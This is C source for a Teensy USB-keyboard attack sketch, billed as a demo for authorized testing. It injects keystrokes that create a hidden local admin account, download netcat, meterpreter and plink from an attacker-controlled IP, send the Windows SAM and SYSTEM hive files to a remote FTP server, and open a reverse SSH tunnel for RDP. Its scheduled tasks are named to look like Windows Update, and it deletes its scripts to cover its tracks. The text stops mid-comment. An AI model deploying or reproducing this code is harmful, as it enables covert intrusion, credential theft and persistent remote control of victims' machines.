/** ################################################ ########## HID TEENSY SPLOIT ########## ################################################ Author: Mike Czumak (T_v3rn1x) @SecuritySift www.securitysift.com ################################################ The following teensy sketch is designed to automate several tasks including: - admin acct creation (windows only, requires admin privs) - limited AV bypass via folder-level scanning exceptions (windows only, requires admin privs) - remote file download and upload (windows and mac) - privilege escalation (mac only, limited to pre-Mavericks) - remote shell accces (windows and mac) - remote RDP access (windows only) In it's current state it's more a demo of what can be done with Teensy with much room for expansion and improvement (both functionality and coding) It's been tested on Mac (Maverick and earlier), Windows XP and Windows 7 and on Teensy 3.1. Some of the functions utilize slighlty modified versions of scripts found on the webz as well as Offsec's Peensy code: https://github.com/offensive-security/hid-backdoor-peensy You are free to copy, modify, and reuse any or all of this code as long as you maintain original author attribution and do not incorporate it into any commercial product or service. Be sure to only execute this sketch on targets for which you have expressed permission! **/ /** ################################################ ############### CONFIG ############## ################################################ set common global variables used in functions ################################################ **/ /** universal variables -- OS-independent variables used across multiple functions global vars are being used for configuration as multiple functions require ability to access and in some cases, set the value for these variables and flags. **/ // remote ips/ports/urls for shells, downloads, and uploads const char *remote_ip = "192.168.1.1"; // ip for establishing remote shell connection const char *remote_met32_port = "4444"; // port for establishing remote 32-bit meterpreter connection const char *remote_met64_port = "4445"; // port for establishing remote 64-bit meterpreter connection const char *remote_tcp32_port = "4446"; // port for establishing remote 32-bit reverse tcp connection const char *remote_nc_port = "5555"; // secondary port for fallback netcat shell only const char *remote_url = "http://192.168.1.1/"; // url for downloading remote files to machine const char *remote_ftp = "192.168.1.1"; // ftp server for get/put of files to/from target machine // users/passwords/ssh keys -- ssh key used for plink registry modification const char *remote_user = "remoteuser"; // username for any credentialed communications such as ftp or plink tunnel const char *remote_pass = "remoteuser"; // password for any credentialed communications such as ftp or plink tunnel const char *local_user = "r00ted"; // username to use when creating local admin account const char *local_pass = "r00ted"; // password to use when creating local admin account const char *ssh_key = "0x10001,[PUT KEY HERE]"; // the lock leds (CAPS/NUM/SCROLL) are used as binary indicators to communicate the results of a script to the Teensy // this sketch only uses a single key (NUMLOCK) though it could be modified to use a different key or multiple keys to // communicate more than one data point from each script; these are not used in the Mac script (will be ignored) const char *lock_type = "NUMLOCK"; // set to desired lock led to use for setting state (NUMLOCK or CAPSLOCK or SCROLLLOCK) unsigned int lock_check_attempts = 2; // number of attempts to check lock key led status to validate script results unsigned int lock_check_wait = 1000; // amount of time in milliseconds to wait between attempts to check lock key led status boolean dip_on = true; // set to true if a dip switch is attached boolean persistent_shell = true; // set to true if you want to attempt a persistent shell // DIP switch pin initialization; change these pin values depending on your Teensy model (2.0 vs. 3.0) and dip switch pin count // currently set for a 4 switch DIP on Teensy 3.1 unsigned int dip1 = 12; unsigned int dip2 = 11; unsigned int dip3 = 10; unsigned int dip4 = 9; // Teensy 3.0 has LED on 13 const int led_pin = 13; // used to set target OS if no DIP switch is attached; ignore if you are using a DIP switch // if is_Win is set to true a subsequent function will determine the flavor (XP or 7+) struct _OS { unsigned int is_Mac : 1; // please note this is the bit field size, not a boolean value. Don't change! unsigned int is_Win: 1; } OS = {0,0}; // if dip_on is set to false, you'll need to set the target OS manually here (only set one!) // various flags used to maintain state between functions based on boolean checks communicated via LED state // DON'T CHANGE -- these are bit field sizes, not boolean values! struct _flags { unsigned int is_user : 1; unsigned int is_admin : 1; unsigned int is_win7 : 1; unsigned int is_64bit : 1; unsigned int persist : 1; }; _flags flag = {0,0,0,0,0}; // initialize all check flags to false; subsequent OS-dependent functions will set as needed // DON'T CHANGE -- these will be set automatically /** Windows variables -- Variables only used in Windows-specific functions **/ // names to use when creating tasks on target const char *win_netcat_task_name = "WindowsUpdateNcTaskSystemService"; // name to use for netcat scheduled task const char *win_python_task_name = "WindowsUpdatePyTaskSystemService"; // name to use for python scheduled task const char *win_vbscript_task_name = "WindowsUpdateVBTaskSystemService"; // name to use for vbscript scheduled task const char *win_powershell_task_name = "WindowsUpdatePSTaskSystemService"; // name to use for powershell scheduled task const char *win_local_target_folder ="C:\\temp\\a1b2c3d4e5f6g7h8i9j0\\"; // location on victim machine where exe's and other files // will be downloaded and a target for AV circumvention // will attempt to create new folder using this value (fails quietly if exists) // file names to use when creating persistent shells on target machine const char *win_python_file_name = "shell.py"; // name to use when creating persistent python shell on target const char *win_vbscript_file_name = "shell.exe"; // name to use when creating persistent vbscript shell on target const char *win_psscript_file_name = "shell.ps1"; // name to use when creating persistent powershell shell on target // remote files to fetch from attacking machine -- modify if you have these saved under different names const char *netcat_remote_file = "nc.exe"; const char *meterpreter_remote_file = "shell.exe"; const char *plink_remote_file = "plink.exe"; // array of remote files to fetch from target machine char win_target_files[][50] = { "C:\\windows\\system32\\config\\sam", "C:\\windows\\system32\\config\\system" }; /** Mac variables -- Variables only used in Mac-specific functions **/ // placeholder for mac-specific variables /** ################################################ ############# COMMON FUNCTIONS ########### ################################################ **/ /** fetch led keys **/ int ledKeys(void) {return int(keyboard_leds);} /** check state of designated lock key **/ boolean isLockOn(void) { if (lock_type == "NUMLOCK"){return ((ledKeys() & 1) == 1) ? true : false;} if (lock_type == "CAPSLOCK"){return ((ledKeys() & 2) == 2) ? true : false;} if (lock_type == "SCROLLLOCK"){return ((ledKeys() & 4) == 4) ? true : false;} } /** toggle the designated lock key **/ void toggleLock(void) { if (lock_type = "NUMLOCK"){ Keyboard.set_key1(KEY_NUM_LOCK); } else if (lock_type = "CAPSLOCK") { Keyboard.set_key1(KEY_CAPS_LOCK); } else if (lock_type = "SCROLLLOCK") { Keyboard.set_key1(KEY_SCROLL_LOCK); } Keyboard.send_now(); clearKeys(); } /** reset LED state **/ void lockLEDReset(void) { if (isLockOn()) { toggleLock(); } } /** from offensive security peensy code set **/ void blink_fast(void) { unsigned int blinkcounter=0; unsigned int blinkrate=5; for(blinkcounter=0; blinkcounter!=blinkrate; blinkcounter++) { digitalWrite(led_pin, HIGH); delay(lock_check_wait); digitalWrite(led_pin, LOW); delay(lock_check_wait); } } /** Wait for OS to be ready before script execution Slightly mod'd version from Offsec Peensy code **/ void wait_for_drivers(void) { boolean numLockTrap = isLockOn(); while(numLockTrap == isLockOn()) { blink_fast(); toggleLock(); delay(lock_check_wait); } toggleLock(); delay(lock_check_wait); } /** check result of script using designated lock key LED as defined in config section **/ boolean checkResult (void) { unsigned int i = 0; do { delay(lock_check_wait); if (isLockOn()) { toggleLock(); delay(700); return true; } i++; } while (!isLockOn() && (i> 8 & 0xff), (port & 0xff)); } else if (hextype == "python") { sprintf(tempporthex, "\\x%.2x\\x%.2x",(port >> 8 & 0xff), (port & 0xff)); } else if (hextype == "powershell"){ sprintf(tempporthex, "$rport=0x%.2x,0x%.2x;",(port >> 8 & 0xff), (port & 0xff)); } // copy temp hex value to return variable porthex=(char*)malloc(strlen(tempporthex)+1); strcpy(porthex,tempporthex); return porthex; } /** convert each octet of the char string remote_ip into hex **/ char* makeIPHex(char *hextype) { unsigned int oct, oct1, oct2, oct3, oct4, i; char tempiphex[32]; // hold local iphex value char *iphex = NULL; // return iphex char *tempip = NULL; // make a copy of remote_ip to use in modifying function strtok tempip=(char*)malloc(strlen(remote_ip)+1); strcpy(tempip,remote_ip); // grab each octet of the copy of remote_ip to convert to hex oct1 = atoi(strtok(tempip, ".")); i = 2; while (i < 5){ oct = atoi(strtok (NULL, ".")); switch (i){ case 2: oct2 = oct; break; case 3: oct3 = oct; break; case 4: oct4 = oct; break; default: break; } i++; } // format the return value according to hextype argument if (hextype=="vbscript"){ sprintf(tempiphex, "%.2x %.2x %.2x %.2x", oct1,oct2,oct3,oct4); } else if (hextype == "python") { sprintf(tempiphex, "\\x%.2x\\x%.2x\\x%.2x\\x%.2x", oct1,oct2,oct3,oct4); } else if (hextype == "powershell"){ sprintf(tempiphex, "$rhost=0x%.2x,0x%.2x,0x%.2x,0x%.2x;", oct1,oct2,oct3,oct4); } free(tempip); // free memory // copy temp hex value to return variable iphex=(char*)malloc(strlen(tempiphex)+1); strcpy(iphex,tempiphex); return iphex; } /** ################################################ ############ WINDOWS FUNCTIONS ########### ################################################ **/ /** ============= Prompts/Windows/Keys ============= **/ /** minimize all open windows **/ void win_minWindows(void) { delay(300); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_M); Keyboard.send_now(); clearKeys(); } /** restore all previously-minimized windows **/ void win_restoreWindows(void) { delay(300); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_SHIFT); Keyboard.send_now(); Keyboard.set_key1(KEY_M); Keyboard.send_now(); clearKeys(); } /** close the current window **/ void win_closeWindow(void) { delay(300); Keyboard.set_modifier(MODIFIERKEY_ALT); Keyboard.set_key1(KEY_F4); Keyboard.send_now(); clearKeys(); } /** equivalent of Winkey + R **/ void win_run(void) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); clearKeys(); } /** open cmd.exe as admin **/ void win_openCmd(void) { delay(300); win_run(); Keyboard.print("cmd.exe"); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); Keyboard.send_now(); clearKeys(); } /** open cmd.exe as admin - alt version for VM testing**/ void win_openCmdAlt(void) { delay(300); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); clearKeys(); Keyboard.print("cmd.exe"); Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT); Keyboard.send_now(); Keyboard.set_key1(KEY_ENTER); Keyboard.send_now(); clearKeys(); delay(500); sendKey(KEY_LEFT); delay(200); sendKey(KEY_ENTER); // confirm security prompt } /** open powershell **/ void win_openPowershell(void) { delay(300); Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.send_now(); clearKeys(); Keyboard.println("powershell"); } /** send ctrl-alt-del sequence **/ void win_sendCtrlAltDel(void) { Keyboard.set_modifier(MODIFIERKEY_CTRL); Keyboard.send_now(); Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT); Keyboard.send_now(); Keyboard.set_key1(KEY_DELETE); Keyboard.send_now(); clearKeys(); } /** open python prompt **/ void win_openPythonPrompt(char *path) { Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); Keyboard.set_key1(KEY_R); Keyboard.send_now(); clearKeys(); delay(300); Keyboard.print(F(path)); Keyboard.println("python"); } /** Lock the workstation **/ void win_lockWS(void) { win_openCmd(); delay(200); Keyboard.println("rundll32.exe user32.dll LockWorkStation"); } /** Restart the workstation **/ void win_restartWS(void) { win_run(); delay(200); Keyboard.println("shutdown -r -t 0"); Keyboard.set_key1(KEY_ENTER); // to address the prompt Keyboard.send_now(); clearKeys(); } /** Toggle the desired "lock" key as defined in the config section **/ void win_toggleLockKey(char key) { win_openCmd(); // open cmd.exe Keyboard.print(F("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{")); Keyboard.print(F(key)); Keyboard.println(F("}\"' > presslock.vbs")); delay(400); Keyboard.println(F("cscript presslock.vbs")); delay(2000); win_deleteFile(win_local_target_folder, "presslock.vbs"); } /** ============= File management & disk cleanup ============= **/ /** create a directory; can be useful to have a known location for file download/creation and AV exceptions use win_local_target_folder variable declared in config section if you want to create a location for file and script storage that doesn't already exist on the machine (e.g. C:\\temp\). Even if it does exist, it will fail gracefully **/ void win_createFolder(const char *path) { win_openCmd(); delay(300); Keyboard.print(F("mkdir ")); delay(300); Keyboard.println(F(path)); delay(300); Keyboard.println("exit"); } /** delete a file -- use for script cleanup **/ void win_deleteFile(const char *path, const char *filename) { win_openCmd(); delay(500); Keyboard.print(F("del ")); delay(300); Keyboard.print(F(path)); delay(300); Keyboard.println(filename); delay(500); Keyboard.println("exit"); } /** Not currently used in this sketch Run disk cleanup utlitity or empty the recycle bin. Not forensic cleanup but better than nothing With the winDeleteFile function you should not have to use this but if you find yourself in need of a cleanup script you may choose to use / modify as needed. **/ void win_diskCleanup(void) { delay(200); if (flag.is_admin) { // use cleanmgr to empty recycle bin, temp files, etc; this can be error prone as it's currently GUI based! win_run(); Keyboard.println("c:\\windows\\system32\\cleanmgr.exe /sageset:55555"); // arbitrarily chosen profile number to avoid existing sageset profile delay(2000); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_SPACE); // Options can differ based on account sendKey(KEY_DOWN); sendKey(KEY_SPACE); // These should at least select "Recycle Bin" sendKey(KEY_DOWN); sendKey(KEY_SPACE); // and temporary internet files sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); sendKey(KEY_DOWN); // make sure we key down to last options sendKey(KEY_TAB); sendKey(KEY_ENTER); // "Ok" delay(200); Keyboard.println(""); // This was necessary for next cmd to execute during testing delay(500); win_run(); Keyboard.println("c:\\windows\\system32\\cleanmgr.exe /sagerun:55555"); } else { // can't use cleanmgr, empty recycle bin only from gui win_openCmd(); Keyboard.println("start shell:RecycleBinFolder"); delay(300); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_TAB); sendKey(KEY_ENTER); // "Empty Recycle Bin" delay(300); sendKey(KEY_ENTER); // Confirm "Yes" delay(300); win_closeWindow(); delay(300); } //Keyboard.println("exit"); win_closeWindow(); } /** ============= Check Scripts ============= **/ /** The following "check" scripts return boolean values based on tested conditions (is user an admin?, does file exist?, etc). The results are communicated to the Teensy via LED states (CAPSLOCK, NUMLOCK). In addition to returning a boolean value some checks may also set a flag (see config section). Maintaining this state via flags is preferred if additional functions need to check the same state later in the program logic in order to avoid the overhead of re-running the script **/ /** check if the current user is an administrator **/ boolean win_checkIfAdmin() { lockLEDReset(); // reset state of lock key to off win_openCmd(); delay(500); const char *scriptname = "admincheck.vbs"; Keyboard.print(F("echo Set objNetwork = CreateObject(\"Wscript.Network\") : ")); Keyboard.print(F("strComputer = objNetwork.ComputerName : ")); Keyboard.print(F("strUser = objNetwork.UserName : ")); Keyboard.print(F("strObject = \"WinNT://\" ^& strComputer ^& \"/Administrators\" : ")); Keyboard.print(F("Set objGroup = GetObject(strObject) : For Each objUser in objGroup.Members : ")); Keyboard.print(F("If LCase(objUser.Name) = LCase(strUser) Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); Keyboard.print(F(lock_type)); Keyboard.print(F("}\" : End If : Next >")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, scriptname); // delete script file delay(2000); if (checkResult()) { flag.is_admin = 1; // if lock led is on, the current user is an admin return true; } return false; } /** checks if a given program is installed on the machine **/ boolean win_checkIfInstalled(char *program_name) { lockLEDReset(); // reset state of lock key to off win_openCmd(); delay(500); const char *scriptname = "installcheck.vbs"; Keyboard.print(F("echo Const HKLM = ^&H80000002 : ")); delay(200); Keyboard.print(F("strKeyPath = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\" : ")); delay(200); Keyboard.print(F("strValueName = \"DisplayName\" : ")); delay(200); Keyboard.print(F("Set objReg = GetObject(\"winmgmts://./root/default:StdRegProv\") : ")); delay(200); Keyboard.print(F("objReg.EnumKey HKLM, strKeyPath, arrSubkeys : ")); delay(200); Keyboard.print(F("For Each subkey In arrSubkeys : ")); delay(200); Keyboard.print(F("intRet = objReg.GetStringValue(HKLM, strKeyPath ^& subkey, strValueName, strValue) : ")); delay(200); Keyboard.print(F("If inStr(strValue, \"")); delay(200); Keyboard.print(F(program_name)); delay(200); Keyboard.print(F("\") Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); delay(200); Keyboard.print(F(lock_type)); delay(200); Keyboard.print(F("}\" : End If : Next >")); delay(200); Keyboard.print(F(win_local_target_folder)); delay(200); Keyboard.println(scriptname); delay(500); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, scriptname); // delete script file if (checkResult()) { return true; } return false; } /** check if a user exists on the system; useful if you created a new user (via win_addUser()) and want to verify the operation was successful **/ boolean win_checkIfUser(void) { lockLEDReset(); // reset state of lock key to off win_openCmd(); delay(500); const char *scriptname = "usercheck.vbs"; Keyboard.print(F("echo Set objNetwork = CreateObject(\"Wscript.Network\") : ")); Keyboard.print(F("strComputer = objNetwork.ComputerName : ")); Keyboard.print(F("strObject = \"WinNT://\" ^& strComputer ^& \"\" : ")); Keyboard.print(F("Set objGroup = GetObject(strObject) : ")); Keyboard.print(F("objGroup.Filter = Array(\"user\") : ")); Keyboard.print(F("For Each objUser in objGroup : ")); Keyboard.print(F("If objUser.Name = \"")); Keyboard.print(F(local_user)); Keyboard.print(F("\" Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); Keyboard.print(F(lock_type)); Keyboard.print(F("}\" : End If : Next >")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, scriptname); // delete script file if (checkResult()) { return true; } return false; } /** check if a file exists on the filesystem useful if you download a file via one of the "fetch" functions and want to verify success **/ boolean win_checkIfFile(const char *filepath, const char *filename) { lockLEDReset(); // reset state of lock key to off win_openCmd(); delay(500); const char *scriptname = "filecheck.vbs"; Keyboard.print(F("echo Set objFSO = CreateObject(\"Scripting.FileSystemObject\") : If objFSO.FileExists(\"")); delay(200); Keyboard.print(F(filepath)); delay(200); Keyboard.print(F(filename)); delay(200); Keyboard.print(F("\") Then : Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); delay(200); Keyboard.print(F(lock_type)); delay(200); Keyboard.print(F("}\" : ")); Keyboard.print(F("End If >")); delay(200); Keyboard.print(F(win_local_target_folder)); delay(200); Keyboard.println(scriptname); delay(500); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); delay(200); Keyboard.println(scriptname); delay(500); Keyboard.println("cd \\ && exit"); delay(1000); win_deleteFile(win_local_target_folder, scriptname); // delete script file delay(1000); if (checkResult()) { return true; } return false; } /** Verify that you're connected to the remote ip (as defined in the config section) useful if you want to verify success of remote shell **/ boolean win_checkIfConnected() { lockLEDReset(); // reset state of lock key to off win_openCmd(); delay(500); const char *scriptname = "netstatcheck.vbs"; Keyboard.print(F("echo Set WshShell = CreateObject(\"Wscript.Shell\") : ")); Keyboard.print(F("set WshExec = WshShell.Exec(\"netstat -an\") : ")); Keyboard.print(F("Do While Not WshExec.StdOut.AtEndOfStream : ")); Keyboard.print(F("outline = WshExec.StdOut.ReadLine() : ")); Keyboard.print(F("If ((InStr(outline, \"")); Keyboard.print(F(remote_ip)); Keyboard.print(F("\")) And (Instr(outline, \"ESTABLISHED\"))) Then : ")); Keyboard.print(F("Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); Keyboard .print(F(lock_type)); Keyboard.print(F("}\" : wscript.quit : ")); Keyboard.print(F("End If : Loop >")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, scriptname); // delete script file if (checkResult()) { return true; } return false; } /** Checks version of windows. Currently this is a boolean/binary check for Win XP. Used to determine if it should proceed with the vbscript-based XP functions or the PowerShell-based functions. **/ boolean win_checkIfWinXP(void) { lockLEDReset(); // reset state of lock key to off win_openCmd(); delay(2000); const char *scriptname = "oscheck.vbs"; Keyboard.print(F("echo Set SystemSet = GetObject(\"winmgmts:\").InstancesOf(\"Win32_OperatingSystem\"): ")); Keyboard.print(F("for each System in SystemSet : OS = System.Caption : ")); Keyboard.print(F("if inStr(OS, \"Windows XP\") Then : ")); Keyboard.print(F("Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); Keyboard.print(F(lock_type)); Keyboard.print(F("}\" : ")); Keyboard.print(F("End If : Next >")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, scriptname); // delete script file if (!checkResult()) { flag.is_win7 = 1; return true; // if designated lock led is on, then it's a Windows XP machine } return false; } /** Check for Windows architecture using vbscript. slightly mod'd version of Offsec Peensy function **/ boolean win_checkArch(void) { const char *scriptname = "arch.vbs"; win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("echo If Is64Bit Then: Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{NUMLOCK}\"':End If > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); Keyboard.print(F("echo Function Is64Bit(): Is64Bit = False: Dim colOS : Set colOS = GetObject(\"WinMGMTS://\").ExecQuery(\"SELECT AddressWidth FROM Win32_Processor\",,48): Dim objOS: For Each objOS In colOS: If objOS.AddressWidth = 64 Then Is64Bit = True >> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); Keyboard.print(F("echo Next: End Function >> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(700); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(scriptname); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, scriptname); // delete script file delay(500); if (checkResult()) { flag.is_64bit = 1; // if caps is on, then arch = 64-bit exists } } /** Checks for the presence of the task created by win_create____ScheduledTask() **/ boolean win_checkForTask(const char *taskname) { const char *script_name = "\\taskcheck.vbs"; win_openCmd(); // open cmd.exe delay(300); Keyboard.print(F("echo function runCommand(command) : Dim objShell, objCmdExec : Set objShell = CreateObject(\"Wscript.Shell\") : set objCmdExec = objshell.exec(command): runCommand =objCmdExec.StdOut.ReadAll : end function : ")); Keyboard.print(F("result = runCommand(\"cmd /c schtasks /query | findstr ")); Keyboard.print(F(taskname)); Keyboard.print(F("Set WshShell = WScript.CreateObject(\"WScript.Shell\"):WshShell.SendKeys \"{")); Keyboard.print(F(lock_type)); Keyboard.print(F("}\" : End If >")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(300); Keyboard.print("cscript "); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(500); Keyboard.println("exit"); win_deleteFile(win_local_target_folder, script_name); if (checkResult()) { return true; // if caps is on, then the task exists } } /** ============= File Transfer/Networking ============= **/ /** put file to remote server from victim machine via FTP **/ void win_putFileFTP(char *filepath) { const char *script_name = "\\ftpscript.txt"; delay(200); win_openCmd(); delay(200); Keyboard.print("@echo open "); delay(200); Keyboard.print(F(remote_ftp)); // ip of remote ftp server delay(200); Keyboard.print(F("> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.print(F("@echo ")); delay(200); Keyboard.print(F(remote_user)); // ftp user delay(200); Keyboard.print(F(">> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.print(F("@echo ")); delay(200); Keyboard.print(F(remote_pass)); // ftp pass delay(200); Keyboard.print(F(">> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.print(F("@echo bin >> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.print(F("@echo PUT ")); delay(200); Keyboard.print(F(filepath)); // path and name of file to put delay(200); Keyboard.print(F(">> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.print(F("@echo quit>> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.print("ftp -s:"); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(200); Keyboard.println("exit"); delay(500); win_deleteFile(win_local_target_folder, script_name); // cleanup script file } /** fetch file from remote server via FTP; takes one arg (filename); uses remote ftp IP defined in config section **/ void win_fetchFileFTP(const char *filename) { delay(500); win_openCmd(); delay(500); Keyboard.print(F("cd ")); Keyboard.println(F(win_local_target_folder)); // move to target directory on victim machine Keyboard.print("@echo open "); Keyboard.print(F(remote_ftp)); // ip of remote ftp server Keyboard.println(F("> ftpscript.txt")); Keyboard.print(F("@echo ")); Keyboard.print(F(remote_user)); // ftp user Keyboard.println(F(">> ftpscript.txt")); Keyboard.print(F("@echo ")); Keyboard.print(F(remote_pass)); // ftp pass Keyboard.println(F(">> ftpscript.txt")); Keyboard.println(F("@echo bin >> ftpscript.txt")); Keyboard.print(F("@echo GET ")); delay(200); Keyboard.print(F(filename)); // name of file to fetch from remote ftp server delay(200); Keyboard.print(F(" ")); Keyboard.print(F(win_local_target_folder)); delay(200); Keyboard.print(F(filename)); delay(200); Keyboard.println(F(">> ftpscript.txt")); Keyboard.println(F("@echo quit>> ftpscript.txt")); Keyboard.println("ftp -s:ftpscript.txt"); delay(500); Keyboard.println("cd \\ && exit"); win_deleteFile(win_local_target_folder, "ftpscript.txt"); // cleanup script file } /** fetch file over HTTP via VBScript; takes one arg (filename); uses remote url defined in config section **/ void win_fetchFileHTTP(const char *filename) { const char *script_name = "fetchhttp.vbs"; delay(500); win_openCmd(); // open cmd.exe delay(1000); Keyboard.print(F("echo strFileURL = \"")); Keyboard.print(F(remote_url)); // remote web server Keyboard.print(F(filename)); // name of file to fetch Keyboard.print(F("\" : strHDLocation = \"")); Keyboard.print(F(win_local_target_folder)); // location to save file (set in config section) Keyboard.print(F(filename)); // name of file to fetch Keyboard.print(F("\" : Set objXMLHTTP = CreateObject(\"MSXML2.XMLHTTP\") : ")); Keyboard.print(F("objXMLHTTP.open \"GET\", strFileURL, false: objXMLHTTP.send() : If objXMLHTTP.Status = 200 Then :")); delay(500); Keyboard.print(F("Set objADOStream = CreateObject(\"ADODB.Stream\") : objADOStream.Open :")); Keyboard.print(F("objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 :")); delay(500); Keyboard.print(F("Set objFSO = Createobject(\"Scripting.FileSystemObject\") : ")); // doesn't take into account whether the file exists Keyboard.print(F("objADOStream.SaveToFile strHDLocation : objADOStream.Close : Set objADOStream = Nothing : End if : Set objXMLHTTP = Nothing > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(1000); Keyboard.print(F("cscript ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(script_name); delay(2000); Keyboard.println("exit"); delay(500); win_deleteFile(win_local_target_folder, script_name); // cleanup script file } /** fetch a file, first attempting with HTTP, then with FTP uses win_fetchFileFTP and win_fetchFileHTTP **/ boolean win_fetchFile(const char *filename) { win_fetchFileHTTP(filename); delay(2000); if (win_checkIfFile(win_local_target_folder, filename)){return true;} delay(2000); win_fetchFileFTP(filename); delay(2000); if (win_checkIfFile(win_local_target_folder, filename)){return true;} return false; } /** open reverse SSH RDP connection to remote machine use with win_getRDP() **/ void win_plinkRDP(void) { win_openCmd(); // open cmd.exe delay(500); Keyboard.print(F("reg add \"HKEY_CURRENT_USER\\SOFTWARE\\SimonTatham\\PuTTY\\SshHostKeys\" /v rsa2@22:")); Keyboard.print(F(remote_ip)); Keyboard.print(F(" /t REG_SZ /d ")); Keyboard.print(F(ssh_key)); Keyboard.println(F(" /f")); delay(500); // build the batch script const char *bat_script_name = "rdp.bat"; Keyboard.print(F("echo @echo off > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(bat_script_name); Keyboard.print(F("echo start /b \"")); Keyboard.print(F(win_local_target_folder)); Keyboard.print(F("\" plink -l ")); Keyboard.print(F(remote_user)); Keyboard.print(F(" -pw ")); Keyboard.print(F(remote_pass)); Keyboard.print(F(" -C -R 3389:127.0.0.1:3389 ")); Keyboard.print(F(remote_ip)); Keyboard.print(F(" >> ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(bat_script_name); // create vbscript to run batch script without command window const char *vb_script_name = "rdp.vbs"; Keyboard.print(F("echo Set oShell = CreateObject (\"Wscript.Shell\") : Dim strArgs : strArgs = \"cmd /c ")); Keyboard.print(F(bat_script_name)); Keyboard.print(F("\" : oShell.Run strArgs, 0, false > ")); Keyboard.print(F(win_local_target_folder)); Keyboard.println(vb_script_name); delay(500); Keyboard.println("exit"); // run vbscript to launch batch script delay(300); win_run(); delay(300); Keyboard.print(F(win_local_target_folder)); Keyboard.println(vb_script_name); // delete scripts delay(500); win_deleteFile(win_local_target_folder, bat_script_name); delay(500); win_deleteFile(win_local_target_folder, vb_script_name); } /** ============= Misc Admin Functions ============= **/ /** add admin user **/ void win_addUser(const char *username, const char *password) { win_openCmd(); delay(500); Keyboard.print(F("net user ")); Keyboard.print(username); Keyboard.print(F(" ")); Keyboard.print(password); Keyboard.println(F(" /add")); delay(500); Keyboard.print(F("net localgroup administrators ")); Keyboard.print(username); Keyboard.println(F(" /add")); delay(500); Keyboard.print(F("reg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\" /v ")); Keyboard.print(username); Keyboard.println(F(" /d 0 /t REG_DWORD /f")); delay(500); Keyboard.println("exit"); } /** open a program under within the current 